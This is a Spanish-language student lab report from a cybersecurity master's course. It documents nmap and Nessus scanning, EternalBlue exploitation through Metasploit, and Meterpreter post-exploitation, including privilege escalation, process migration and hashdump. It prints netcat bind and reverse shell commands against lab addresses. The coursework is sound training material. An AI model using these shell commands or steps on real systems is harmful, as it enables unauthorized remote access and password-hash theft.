Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario
Explotación y posexplotación con Metasploit
Hacking Ético y análisis de malware
Jose Mario Gomez Rodriguez
© Universidad Internacional de La Rioja (UNIR)
Universidad Internacional de La Rioja (UNIR)
Máster Universitario en Ciberseguridad
27 de mayo del 2024
1
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario
Tabla de contenido
1. Fingerprinting y recopilación de todos los puertos y versiones
posibles.....................................................................................................................4
2. Explicar la diferencia entre un payload de tipo bind y reverse, y
ejemplificarla..........................................................................................................6
3. Explotar vulnerabilidad y obtener control.............................................7
4. obtener el control remoto de la máquina a través de un
meterpreter...........................................................................................................10
5. Posexplotación.............................................................................................12
6. Conclusiones.................................................................................................13
Ilustración 1Uso de virtual box....................................................................................4
Ilustración 2Configuración de red...............................................................................4
Ilustración 3Identificación de host con NMAP............................................................5
Ilustración 4Maquina Objetivo....................................................................................5
Ilustración 5Puertos y servicios...................................................................................6
Ilustración 6Instalación de NESSUS.............................................................................8
Ilustración 7Ejecución de análisis................................................................................8
Ilustración 8Informe de vulnerabilidades....................................................................9
Ilustración 9Vulnerabilidades criticas..........................................................................9
Ilustración 10 Vulnerabilidades medias......................................................................9
Ilustración 11 Valdación de exploit con Meterpreter................................................10
© Universidad Internacional de La Rioja (UNIR)
Ilustración 12 Configuración de exploit.....................................................................10
Ilustración 13Opciones de payload...........................................................................10
Ilustración 14Configurar host objetivo......................................................................11
Ilustración 15Ejecución del exploit............................................................................11
Ilustración 16Elevación de privilegios.......................................................................12
2
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario
Ilustración 17 Procesos activos.................................................................................12
Ilustración 18Proceso seleccionado..........................................................................12
Ilustración 19Migración del proceso.........................................................................13
Ilustración 20Hash de usuarios.................................................................................13
© Universidad Internacional de La Rioja (UNIR)
3
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario
1. Fingerprinting y recopilación de todos los puertos y versiones posibles.
Se realiza la instalación de las máquinas virtuales utilizando virtualbox y la
respectiva configuración de red para las maquinas utilizadas.
Ilustración 1Uso de virtual box
(UNIR )
© Universidad Internacional de La Rioja (UNIR)
Ilustración 2Configuración de red
Se utiliza el comando NMAP para el mapeo y posterior identificación de los host
en la red utilizando el comando nmap –sn 192.168.20.0/24.
4
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario
Ilustración 3Identificación de host con NMAP
Con la identificación de los host se logra identificar la maquina objetivo del
análisis.
Ilustración 4Maquina Objetivo
© Universidad Internacional de La Rioja (UNIR)
Se debe identificar los puertos y servicios que se ejecutan en la maquina objetivo,
para lo cual se utiliza el comando nmap –sS.
5
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario
Ilustración 5Puertos y servicios
2. Explicar la diferencia entre un payload de tipo bind y reverse, y
ejemplificarla.
En el Bind de Shell el sistema objetivo escucha en un puerto especifico
esperando una conexión entrante desde el atacante. Es como si el sistema
comprometido abriera una puerta para esperar que alguien se conecte a él.
Funcionamiento
1. El sistema objetivo ejecuta un programa que abre un puerto y
queda en modo escucha.
2. El atacante se conecta a ese puerto desde su máquina.
3. Una vez establecida la conexión, el ataque puede ejecutar
llamados de comando y control.
Ejemplo
Atacante: Dirección IP “192.168.1.100”
Objetivo: Dirección “192.168.1.200”
© Universidad Internacional de La Rioja (UNIR)
El atacante utiliza Netcat en el sistema operativo objetivo con el comando
“nc -lvp 4444 -e /bin/bash” el cual deja en modo el escucha el puerto
4444 par aque alguien se conecte.
El atacante se conecta al puerto 4444 con el comando nc 192.168.1.200
4444.
6
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario
En Reverse Shell el sistema objetivo se conecta de vuelta a la maquina
controlada por el atacante. El sistema comprometido abre una puerta y luego
sale para conectarse al atacante.
Funcionamiento
1. El atacante configura su máquina para esperar peticiones.
2. El sistema objetivo se conecta al atacante.
3. Una vez establecida la conexión el atacante puede enviar llamados
de comando y control.
Ejemplo
Atacante: Dirección 192.168.1.100
Objetivo: Dirección 192.168.1.200
El atacante utiliza Netcat para escuchar peticiones.
En la máquina del atacante se utiliza el comando “nc -lvp 4444” para
dejar el puerto 4444 en modo escucha.
En la maquina objetivo se ejecuta el comando “nc 192.168.1.100 4444 -
e /bin/bash” para conectar con el atacante y ejecutar el comando -e
/bin/bash.
Diferencias
La principal diferencia es que en Bind Shell el objetivo escucha y el
atacante se conecta mientras que en Reverse Shell el objetivo se conecta
al atacante.
3. Explotar vulnerabilidad y obtener control
Se realiza la instalación de Nessus para realizar un análisis de vulnerabildiades
sobre la maquina objetivo.
© Universidad Internacional de La Rioja (UNIR)
7
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario
Ilustración 6Instalación de NESSUS
Ilustración 7Ejecución de análisis
La ejecución del escaneo nos da como resultado un total de 44 vulnerabilidades
de las cuales se identifican vulnerabilidades críticas de apache y de conexión
remota.
© Universidad Internacional de La Rioja (UNIR)
8
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario
Ilustración 8Informe de vulnerabilidades
Ilustración 9Vulnerabilidades criticas
© Universidad Internacional de La Rioja (UNIR)
Ilustración 10 Vulnerabilidades medias
9
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario
4. obtener el control remoto de la máquina a través de un meterpreter
Se ejecuta meterpreter en Kali para poder realizar la respectiva explotación, una
vez ejecutado se realiza búsqueda de search eternla y se utiliza el exploit ms17-
eternalblue para SMB.
Ilustración 11 Valdación de exploit con Meterpreter
Dentro del exploit se utiliza la opción (0) y la ruta del objetivo.
Ilustración 12 Configuración de exploit
Con el comando show options se ven las opciones del payload, como se puede
evidenciar todas están configuradas con LPORT por defecto en el puerto 4444
solo se debe configurar el RHOST.
© Universidad Internacional de La Rioja (UNIR)
Ilustración 13Opciones de payload
10
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario
Se procede a configurar el host con el comando set host para asignar la dirección
del maquina objetivo.
Ilustración 14Configurar host objetivo
Se procede a utilizar el comando run para ejecutar el exploit y ganar acceso a la
maquina objetivo.
© Universidad Internacional de La Rioja (UNIR)
Ilustración 15Ejecución del exploit
11
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario
5. Posexplotación
Se inicia sesión dentro la maquina objetivo elevando privilegios con meterpreter.
Ilustración 16Elevación de privilegios
Se procede a listar los procesos activos con el comando ps.
Ilustración 17 Procesos activos
Se toma el proceso spoolsv para migrar.
Ilustración 18Proceso seleccionado
Se utiliza el comando migrate para realizar la migración de proceso
© Universidad Internacional de La Rioja (UNIR)
12
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario
Ilustración 19Migración del proceso
Se utiliza el comando hashdump para visualizar los hash de los usuarios del
sistema.
Ilustración 20Hash de usuarios
6. Conclusiones
Con la ejecución de la actividad logramos identificar las fases del hacking como
lo es el reconcomiendo, enumeración, explotación y posexplotación aplicando el
© Universidad Internacional de La Rioja (UNIR)
ciclo del hacking, la cual nos permite interactuar en un ambiente controlado y de
esta forma ejecutar las diferentes aplicaciones que tiene Kali para atacar
maquinas objetivos.
El uso de bash nos permite identificar y atacar maquinas en la red así se tengan
reglas de firewall que bloquean el acceso a los recursos, pero por lo general no
13
Actividades
Asignatura Datos del estudiante Fecha
Hacking Ético y Análisis Apellidos: Gomez Rodriguez
27-05-2024
de Malware Nombre: Jose Mario
crean reglas de salida lo cual permite tener un oyente que permita las conexiones
en escucha ayudando a saltar las políticas de seguridad, con lo cual luego
podemos ejecutar una subida de privilegios con la ejecución de meterpreter y así
combinar distintos ataques para logar nuestro objetivo de comprometer un
activo de información.
La falta de actualizaciones por parte de los equipos de tecnología es una brecha
que nos permite la identificación de vulnerabilidades en los sistemas de las
compañías, al poder utilizar herramientas como Nessus que nos permite
identificar los host o las redes necesarios y sus respectivas vulnerabilidades
como parte del reconocimiento, como atacantes podemos usar esta información
para atacar los activos que se dejan en el olvido y nos facilita una intrusión y
posibles movimientos laterales.
© Universidad Internacional de La Rioja (UNIR)
14
Actividades